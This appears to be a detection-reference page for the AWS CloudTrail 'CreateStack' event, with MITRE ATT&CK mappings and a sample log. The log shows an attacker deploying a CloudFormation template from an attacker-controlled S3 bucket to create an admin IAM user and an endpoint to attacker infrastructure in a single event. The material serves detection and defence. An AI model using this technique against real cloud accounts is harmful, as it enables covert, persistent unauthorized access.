CreateStack
AWS
CreateStack
Event
Creates a CloudFormation stack by provisioning AWS resources defined in a specified template.
Security Context
- Infrastructure-as-code deployments can be abused to provision malicious resources or modify existing configurations at scale.
Log Source
CloudTrail
Sample Event
Adversarial. Draco creates a CloudFormation stack named OccamyMonitoringEnhancement from a TemplateURL pointing at the adversary-controlled S3 bucket. The template provisions: (1) an IAM user with admin permissions, (2) a Lambda function with the OCCAMY pipeline role, (3) a stable VPC endpoint to attacker infrastructure. Because the stack is created with CAPABILITY_NAMED_IAM, all of the IAM resources land at once with consistent provenance — and the audit trail is a single CreateStack event rather than a flurry of CreateRole / CreateUser / AttachUserPolicy events.
{ "eventVersion": "1.09", "userIdentity": { "type": "IAMUser", "principalId": "AIDADRAC0MALF0YBADGY", "arn": "arn:aws:iam::555123456789:user/draco", "accountId": "555123456789", "accessKeyId": "AKIADRAC0MALF0YEXAMP5", "userName": "draco", "sessionContext": { "attributes": { "creationDate": "2026-04-15T18:51:02Z", "mfaAuthenticated": "false" } } }, "eventTime": "2026-04-16T01:18:42Z", "eventSource": "cloudformation.amazonaws.com", "eventName": "CreateStack", "awsRegion": "us-east-1", "sourceIPAddress": "203.0.113.66", "userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6", "requestParameters": { "stackName": "OccamyMonitoringEnhancement", "templateURL": "https://s3.amazonaws.com/draco-exfil-bucket-666/templates/monitoring-666.yaml", "capabilities": [ "CAPABILITY_NAMED_IAM" ], "onFailure": "DO_NOTHING", "disableRollback": true }, "responseElements": { "stackId": "arn:aws:cloudformation:us-east-1:555123456789:stack/OccamyMonitoringEnhancement/66666666-0000-4000-8000-001010011010" }, "requestID": "90000000-0000-4000-8000-000010100010", "eventID": "90000000-0000-4000-8000-000010100011", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "555123456789", "eventCategory": "Management", "tlsDetails": { "tlsVersion": "TLSv1.3", "cipherSuite": "TLS_AES_128_GCM_SHA256", "clientProvidedHostHeader": "cloudformation.us-east-1.amazonaws.com" }}MITRE ATT&CK Mapping
Tactics: Execution Persistence
Techniques:
- T1072 — Software Deployment Tools — Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine adminis...
- T1059 — Command and Scripting Interpreter — Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface a...